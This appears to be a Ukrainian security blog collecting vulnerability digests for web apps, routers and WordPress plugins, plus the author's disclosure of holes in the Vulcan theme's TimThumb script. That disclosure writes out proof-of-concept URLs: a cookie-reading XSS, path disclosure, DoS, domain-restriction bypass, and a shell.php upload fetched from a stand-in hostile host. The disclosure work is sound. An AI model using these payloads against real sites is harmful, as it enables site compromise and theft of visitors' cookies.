Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• EMC Documentum Foundation Services (DFS) Content Access Vulnerability (деталі)
• SQL Injection in Dolphin (деталі)
• Multiple SQL Injection Vulnerabilities in web2Project (деталі)
• Reflected Cross-Site Scripting (XSS) Vulnerability in Storesprite (деталі)
• Linksys EA2700, EA3500, E4200 and EA4500 - Authentication Bypass to Administrative Console (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в WordPress 4.0 та в плагінах Html5 Mp3 Player, Sexy Squeeze Pages, Ad-Manager, CM Download Manager. Для котрих з’явилися експлоіти.

• WordPress Html5 Mp3 Player Full Path Disclosure (деталі)
• WordPress Sexy Squeeze Pages Cross Site Scripting (деталі)
• WordPress Ad-Manager 1.1.2 Open Redirect (деталі)
• WordPress 4.0 Denial Of Service (деталі)
• WordPress CM Download Manager 2.0.6 XSS / CSRF (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Inteno DG301 Command Injection (деталі)
• Endeca Latitude Cross-Site Request Forgery (деталі)
• Secunia CSI/VIM - Filter Bypass & Persistent Validation Vulnerabilities (деталі)
• ClipBucket CMS Xss Vulnerability (деталі)
• Backdoor in NETGEAR Router D6300B (деталі)

Сьогодні я дослідив Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Vulcan для WordPress. Ці уразливості аналогічні тим, що я знайшов в темах для WP ще у лютому 2011, коли виявив дірки в TimThumb (та деякі дірки у квітні).

XSS (WASC-08) (в старих версіях TimThumb):

http://site/wp-content/themes/vulcan/timthumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/vulcan/timthumb.php?src=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS (WASC-10):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

Arbitrary File Upload (WASC-31) (в старих версіях TimThumb):

http://site/wp-content/themes/vulcan/timthumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/themes/vulcan/

Окрім index.php також можливі FPD в інших php-файлах в цій темі.

Уразливі всі версії теми Vulcan для WordPress (в останніх версіях виправлені лише уразливості в TimThumb, але все ще є FPD в інших php-файлах).

У версіях TimThumb до 2.8, де виправлена XSS, наявні всі інші уразливості. А починаючи з версії 2.8 виправлені всі уразливості. Але дірки AoF і DoS виправлені шляхом заборони зовнішніх хостів по замовчуванню. Якщо змінити налаштування (дозволити окремі чи всі зовнішні хости), що програма дозволяє, то знову можна буде проводити атаки на інші сайти. На деяких сайтах не оновлена версія TimThumb в темі, але вони захищаються WAF (як ModSecurity). Зазначу, що WAF не захистить від FPD дірок в цій темі та TimThumb, а в деяких випадках не захистить від AoF і DoS.

В даній добірці уразливості в веб додатках:

• XML External Entity vulnerability in libsvg (деталі)
• Vulnerabilities in phpMyAdmin (деталі)
• Python CGIHTTPServer File Disclosure and Potential Code Execution (деталі)
• Endeca Latitude Cross-Site Scripting (деталі)
• ASUS AiCloud Enabled Routers 12 Models - Authentication bypass and Sensitive file/path disclosure (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в WordPress 3.9.2 та в плагінах SP Client Document Manager, WP-DB-Backup, wpDataTables. Для котрих з’явилися експлоіти.

• WordPress 3.9.2 Cross Site Scripting (деталі)
• WordPress SP Client Document Manager 2.4.1 SQL Injection (деталі)
• WordPress WP-DB-Backup 2.2.4 Backup Theft (деталі)
• WordPress wpDataTables 1.5.3 Shell Upload (деталі)
• WordPress wpDataTables 1.5.3 SQL Injection (деталі)

Експлоіт для WP-DB-Backup використовує уразливість, що я знайшов в 2007 році й опублікував в День багів в WordPress 2.

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Bulletproof-Security, XCloner, Another WordPress Classifieds, SupportEzzy Ticket System, CM Download Manager. Для котрих з’явилися експлоіти.

• WordPress Bulletproof-Security .51 XSS / SQL Injection / SSRF (деталі)
• Joomla/WordPress XCloner Command Execution / Password Disclosure (деталі)
• Another WordPress Classifieds Cross Site Scripting / SQL Injection (деталі)
• WordPress SupportEzzy Ticket System 1.2.5 Cross Site Scripting (деталі)
• WordPress CM Download Manager 2.0.0 Code Injection (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

В даній добірці уразливості в веб додатках:

• Multiple Vulnerabilities in Cisco Secure Access Control System (деталі)
• Vulnerabilities in phpMyAdmin (деталі)
• Multiple vulnerabilities in phpMyAdmin (деталі)
• Security advisory for Bugzilla 4.5.6, 4.4.6, 4.2.11, and 4.0.15 (деталі)
• Critical vulnerabilities in T-Mobile HOME NET Router LTE (Huawei B593u-12) (деталі)

В даній добірці уразливості в веб додатках:

• Apache CloudStack ListNetworkACL API discloses ACLs for other users (деталі)
• Vulnerabilities in phpMyAdmin (деталі)
• HTTP Commander AJS v3.1.9 - Client Side Exception Vulnerability (деталі)
• mediawiki security update (деталі)
• Apache CloudStack Virtual Router stop/start modifies firewall rules allowing additional access (деталі)

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Creative Contact Form, CP Multi View Event Calendar, HTML5 / Flash Player, Download Manager, Clean And Simple Contact Form. Для котрих з’явилися експлоіти.

• WordPress / Joomla Creative Contact Form 0.9.7 Shell Upload (деталі)
• WordPress CP Multi View Event Calendar 1.01 SQL Injection (деталі)
• WordPress HTML5 / Flash Player SQL Injection (деталі)
• WordPress Download Manager Arbitrary File Download (деталі)
• WordPress Clean And Simple Contact Form 4.4.0 XSS (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.